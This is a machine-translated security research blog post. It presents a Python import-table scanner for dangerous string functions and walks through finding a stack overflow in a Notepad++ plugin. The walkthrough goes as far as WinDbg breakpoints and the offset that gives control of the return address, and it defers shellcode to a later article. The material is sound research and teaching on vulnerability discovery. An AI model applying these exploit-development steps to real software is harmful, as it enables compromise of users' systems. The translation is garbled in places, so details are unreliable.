Title:Static scan of vulnerability mining method + Classic Stack Overflow instance
Time: 2014-02-11,01:52:50
This is the author of the publication of the second article on vulnerability mining, and the first article of the time almost spaced a whole year, in this year although the work is fine, but I still took a lot of time to pay attention to safety, because the original goal is to take a safe road. This year has also done a lot of things about security, such as participation in the major *src of the loopholes to submit what, there was a period of time is also the same, but later I stopped, because I think that kind of things deviate from my initial definition of "loophole" mining, see those submitted by the so-called "loopholes", Basic is the vulnerability of functional defects (this is only said that the PC terminal products, Web vulnerabilities are not covered in this article), such as XXX main anti-load driver, write startup items, kill XXX kill soft and so on, these also belong to a product of the loophole, but this kind of functional defect type vulnerability with a high-level confrontation means, The exploitation and utilization of this vulnerability is completely out of the analysis of the underlying binary level instruction execution process, the only use of this vulnerability mining is that you may be more familiar with the small subsystems of an operating system, of course, if you are a likes to summarize the traced mapping, you will "systematic" study, Otherwise you can only become a martial arts will be a recruit half-style people, only know it, but can not know why. Vulnerability mining or to return to the essence, as far as I know, the current domestic real to do loopholes mining more pragmatic and have a lot of results of the company's Jade source and 360. The source and security treasure from the development process is similar, but the former bias host security, the latter biased to web security. Have seen some of the source of the Rich Jade Blog and Microsoft submitted the loopholes, think they do is the real vulnerability mining.
To get back to the topic of this article, the previous article is about the Fuzz method of vulnerability mining and introduces the local DOS vulnerability inside the Windows XP Afd.sys, this article is another method of vulnerability mining-static scanning of potentially dangerous functions. In order to enrich the content of the work, the author in their own use of static scanning found in the vulnerability of a classic stack overflow, including the overflow of the mining process, the use of methods, shell code structure.
Partⅰ static scanning methodology and tool development
Vulnerability mining methods are numerous, such as fuzz, source auditing, binary code scanning and so on. Fuzz belongs to the dynamic method, all dynamic methods need to have a more comprehensive path coverage, so the need for higher automation systems, to achieve a higher cost. Source audit implementation is relatively simple, but need to contact the source code, so for the third-party detection agencies are generally not able to use this method.
And that's the main character of the day.-Binary code scanning: The idea of this method is to scan the binary files of the target program, through the PE file analysis, instruction analysis and so on to discover the potential vulnerability code in the target program. The most easy to think of is to scan the PE file into the table, find out if there is a dangerous function, this scanning method is fast, and more effective, but there are shortcomings: the detection rate is not high, there is omission, because only scan to pour into the table this aspect, and if some modules are using static Lib link, It is possible to embed some dangerous functions directly inside the module, and it does not exist in the table. Therefore, the method of instruction analysis is required, but the implementation of instruction analysis is more difficult and expensive, because all the vulnerability patterns are taken into account, which also leads to a very slow detection of another flaw.
For scattered vulnerability developers, there is no experience and time to achieve a more systematic tool, but into the table scan this is relatively easy to achieve. If you're not busy, find a program directory, and then use Dependency Walker to find a way to pour the table, find the function you think is dangerous, who will have so much strength ... So, move small handwriting tool, Bincodeaudit this birth.
Bincodeaudit is a tool developed in the Python language for potentially dangerous functions for bulk scanner import, which was originally designed with the following structure:
P1
Now, other features have been implemented in addition to the UI interface. Here is a code for the main program module of the current command-line mode:
Code:
#!/usr/bin/env python#coding:utf-8 "" " Author: tishion--<[email PROTECTED]>&NBSP;&NBSP;PURPOSE:&NBSP;&NBSP;&NBSP;CREATED:&NBSP;2014/2/9 "" "import osimport Sysimport stringfrom symscan import importsymscannerfrom reportmaker import ReportMakerg_str_help = "" "usage: python bca <target-dir> &NBSP;&NBSP;&NBSP;TARGET-DIR&NBSP;:&NBSP;TARGET&NBSP;DIRECTORY&NBSP;PATH&NBSP;TO&NBSP;BE&NBSP;SCANNED.E.G: python bca "C:\window\system32" "" "Def main (): global g_str_help #process command line arguments if len (SYS.ARGV) <= 1: print ' Sytanx error: missing argument. ' print g_str_help return target_dir = sys.argv[1] if not os.path.isdir (Target_dir): print ' error: the target-dir:[' + target_dir + '] is not a directory! ' return #创建一个扫描器 sc = importsymscanner () #添加需要扫描的目标函数sc. Add_sym (' Msvcr90.dll ', (' wcscpy ', ' strcpy ', ' swprintf ')) sc.add_sym (' Msvcr80.dll ') , (' wcscpy ', ' strcpy ', ' swprintf ')) sc.add_sym (' Msvcrt.dll ', (' wcscpy ', ' strcpy ', ' swprintf ') sc.add_sym (' Kernel32.dll ', (' Lstrcpya '), ' lstrcpyw ', ' lstrcata ', ' LSTRCATW ') #开始扫描 print ' scanning  ... ' rl = sc.do_check (target_dir) print ' scanning is done! ' #生成报告 rm = reportmaker () print ' generating report , ... ' rm. Generatenewreport (TARGET_DIR,&NBSP;RL) #打开报告文件 print ' opening report  ... ' rm. OpenReport () if __name__ == ' __main__ ': main ()How to use:
Code:
f:\projects\python\bincodeaudit>bca.py "F:\Program Files (x86) \sysinternalssuite" Scanning ... Scanning is done! Generating report ... Opening Report ...
How the generated report uses HTML files:
P2
This project has been created in SF version, if interested students can apply together to join the development maintenance, if there is a good comparison of large features want to help add also welcome to my pull branch.
Github Address:Https://github.com/tishion/BinCodeAudit
A case of Partⅱ static scan and classic stack Overflow
The above simply introduces the development of static scanning tools, development tools are not the purpose, the use of tools to find more loopholes is our goal, grinding the knife can be tried, I am here to choose notepad++ This program to do the example.
First, scan the binary code, discover the target
First Use our tool to scan all the files in the entire installation directory to detect if there is a target function, here our objective function selects the CRT library function strcpy,wcscpy, and the LSTRCPYA/W,LSTRCATA/W in the Kernle32 module. Then directly start sweep to get the scan Results report:
P3
You can see that can lead to stack overflow dangerous function or a lot of, the main program only detects two dangerous functions, while the other is mostly notepad++ plug-in module, it seems notepad++ plug-in developers contribute to the code quality is not very high. Now select a target, we will notepad++.exe this program to import the Lstrcpyw this function as a target, and then we will start to analyze.
second, try to static analysis function call point, found the vulnerability trigger scenario
First, static analysis Notepad++.exe See if we can find the place where the LSTRCPYW function is called using the data we can control as the source string parameter. But...... With Ida's initial view, the function has too many call points, and the static analysis method requires too much manpower:
P4
So, this step directly skipped, because this is just a way to find the problem, since this method cost too high, there is no need to tangle must use this method, and then have the opportunity to choose a direct static analysis directly to find the vulnerability of the example.
third, debugging analysis, found the vulnerability trigger scenario
Static Analysis method does not work, then directly debugging, debugging time to understand three points:
1. We're looking for a stack Overflow
2. Overflow function may occur in LSTRCPYW
3. We want to find the source string that we can control when we call the LSTRCPYW function.
Clear the above three points we have to think of the method through the debugger to help us find the above 3 described scenario, it is easy to think of the LSTRCPYW function under the breakpoint, and each breakpoint when the LSTRCPYW function of the source string output, so that we can confirm that the data is controllable.
Open Noetpad++.exe and then use the WinDbg attach process to set breakpoints:
Code:
bp kernel32!lstrcpyw "du poi (@esp +8); G"
Then to do is to operate the notepad++, and observe the output of the debugger, this is a relatively time-consuming process, need to have patience, the notepad++ of the various buttons point over, you can certainly find what we need to find, looking for the process here not in detail, I directly say a scene, This is when you use the notepad++ plugin ccompletion this plugin's goto identifier, as shown in. When no strings are selected, using the menu plugin-ccompletion-goto identifier This feature, you will find that all strings in the current editing area are selected and processed four times by the LSTRCPYW function.
P5
After finding this scenario, we can further confirm that the LSTRCPYW function has the potential for stack overflow, input very long data, and then see if the program will have a problem crash.
P6
As can be seen, after the second copy, the program crash, because of an AV anomaly, it is now possible to conclude that there is a possibility of overflow, but also need to add in-depth to the two calls to analyze. Here to change the condition of the conditional breakpoint, only if the copy of the source string is the string we entered when the time is broken:
Code:
BP kernel32!lstrcpyw ". if (Poi (POI (@esp +8)) =0x00420042) {kv1;}. Else{du poi (@esp +8); g;} "
Because the test string we chose is bbaaaaaa ... So just determine if the first 4 bytes of the source string are 0x00420042. Then repeat the crash scene we just had. Since crash occurs after the second copy, we need to look at the stack after the second copy:
P7
From the above, we can see that the stack has been covered by our data, here to have a bit of pre-judgment, if the stack overflow, then in the next program run will be bound because of a RET instruction in the stack of data into the EIP register, and this value should be 0x00410041, Then the program proceeds from 0x00410041, and with that in mind we can 0x00410x0041 the next breakpoint and continue executing the program.
P8
The program eventually triggers the breakpoint in the 0x00410041, and here, it is very clear that the program has a stack overflow, and we successfully hijacked the EIP, the following we want to calculate the EIP taken to the 0x00410041 located in our data offset address, That is, the return address of the upper function is stored in the stack, do you remember the destination address when you copied the string for the second time? Yes, 0x00135c7c, the value of ESP is 0x1360b0, so we calculate the difference:
Code:
0:000:x86>? 0x1360b0-0x00135c7c Evaluate expression:1076 = 0x00000434
Thus, a DWORD value at the 0x00000434-4 byte of the data we construct is the value of our controllable EIP, and we validate this conclusion by saving the file we have just constructed and then opening it with Winhex. Edit an Dwor value at offset 0x00000434 byte Note the problem with the size side here:
P9
Then save the file, and then use this file to trigger the scene, and see if the EIP is as 0x004142430 as we expected:
P10
It can be seen that the EIP has been our expectation of the 0x00414243, OK, here This overflow point has been completely mastered by us, so far this is a perfect available overflow, the following is to write shellcode to achieve the purpose of using overflow.
The structure of this shellcode is not very smooth, length is relatively long, so this article first written here, the next time will be the shellcode of the construction process in detail and then share it.
Static scan of vulnerability mining method + Classic Stack Overflow instance
